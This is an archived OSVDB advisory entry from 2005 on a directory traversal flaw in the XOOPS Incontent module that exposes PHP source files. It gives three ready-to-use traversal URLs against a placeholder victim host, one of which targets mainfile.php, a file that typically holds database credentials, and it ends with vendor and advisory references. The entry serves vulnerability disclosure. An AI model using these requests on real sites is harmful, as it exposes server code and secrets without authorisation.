XOOPS Incontent Module Traversal Arbitrary PHP File Source Disclosure

2005-01-28T03:55:37
ID OSVDB:13282
Type osvdb
Reporter OSVDB
Modified 2005-01-28T03:55:37

Description

Manual Testing Notes

http://[victim]/modules/incontent/index.php?op=aff&option=0&url=../../../mainfile.php

http://[victim]/modules/incontent/index.php?op=aff&option=0&url=../../../index.php

http://[victim]/modules/incontent/index.php?op=aff&option=0&url=../../../header.php

References:

Vendor URL: http://www.e-xoops.ru/ Vendor URL: http://www.dotcomdesigns.net/modules/incontent/ Security Tracker: 1013034 Secunia Advisory ID:14064